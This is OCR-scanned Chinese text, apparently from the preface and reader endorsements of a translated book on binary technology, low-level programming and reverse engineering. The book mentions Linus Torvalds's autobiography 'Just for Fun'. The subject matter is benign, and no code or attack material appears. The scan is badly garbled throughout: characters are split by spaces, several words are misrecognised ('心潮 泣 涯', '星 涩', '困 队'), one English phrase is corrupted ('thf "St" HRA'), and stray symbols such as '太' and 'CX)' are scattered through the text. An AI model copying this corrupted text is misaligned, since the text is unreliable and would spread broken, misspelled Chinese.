机 能 够 推测 出 人 的 偏好 ， 实 现 这 种 科幻 般 的 技术 的 最 小 单位 依然 是 二 进 
制 数字 。 怎 么 样 ， 是 不 是 觉得 心潮 泣 涯 呢 ? 

原子 组 成 分 子 ， 然 后 组 成 细胞 、 生 物 ， 最 终 由 生物 组 成 了 社会 。 
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在 计算 机 的 世界 里 ， 二 进 制 就 是 创造 一 切 的 基础 。 

也 许 这 样 的 比喻 有 点 夸张 ， 但 计算 机 和 软件 的 工作 原理 对 于 大 多 数 
人 来 说 都 是 类 似 黑 箱 一 样 的 存在 ， 即 使 不 懂 这 些 ， 在 日 常生 活 中 也 不 会 
遇 到 任何 问题 ， 但 如 果 能 够 有 机 会 去 接触 一 下 这 一 领域 的 知识 ， 说 不 定 
能 够 发 现 新 的 乐趣 。 

不 知道 大 家 有 没有 读 过 Linux 之 父 Linus Torvalds 的 自传 Just for 
Fun: The Story of an Accidental Revolutionary’, thf “St” HRA 
计算 机 世界 不 断 发 展 的 原动力 。 

本 书 中 只 是 介绍 了 软件 技术 和 二 进 制 技术 中 很 小 的 一 部 分 ,希望 各 
位 读者 能 够 从 中 找到 “好 玩 ” 的 地 方 ， 同 时 也 和 希望 大 家 能 够 从 这 本 书 中 
获 益 。 





























(D 中文 版 名 为 《只 是 为 了 好 玩 : Linux 之 父 林 纳 斯 自传 》 人 民 邮 电 出 版 社 ，2014 
年 。 译 者 注 
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太 在 Web 当 道 的 时 代 ， 底 层 知识 依然 能 够 在 关键 时 刻 发 挥 作 
用 。 不 学 习 底 层 知 识 可 能 不 会 阻碍 你 成 为 一 名 称职 的 程序 员 ， 
但 也 许 会 阻碍 你 成 为 一 名 优秀 的 程序 员 。 





太 这 并 不 是 一 本 系统 讲解 底层 知识 的 书 ， 但 它 让 我 真切 地 体 
会 到 了 二 进 制 的 有 趣 ， 引 导 我 侥 有 兴致 地 去 读 那 些 星 涩 的 专业 
书籍 。 








友 有 时 为 了 找到 一 些 难度 很 高 的 bug， 必 须 了 解 底层 系统 ， 
这 本 书 教 给 我 们 一 些 实用 的 方法 。 我 常常 会 想象 自己 在 困 队 迟 
迟 找 不 到 bug 眼 看 发 布 就 要 延期 的 时 候 ， 突 然 跳 出 来 说 : “ 交 给 
我 吧 ， 我 用 汇编 语言 来 搞定 ! ”是 不 是 很 帅气 CX) ? 


太 我 想 把 这 本 书 推荐 给 所 有 的 程序 员 。 作 为 一 个 五 年 来 都 在 
埋头 写 代 码 的 码 农 ， 我 性 恐 地 发 现 我 并 不 了 解 我 编写 的 程序 在 
计算 机 中 是 如 何 运 行 的 ， 直 到 我 读 到 了 这 本 书 。 





太 逆 向 工程 可 以 提升 软件 的 安全 性 ， 无 论 对 于 开发 者 还 是 维 
护 者 ， 都 是 必 备 的 技能 。 跟 着 这 本 书 动手 实践 ， 你 将 完美 入 门 。 
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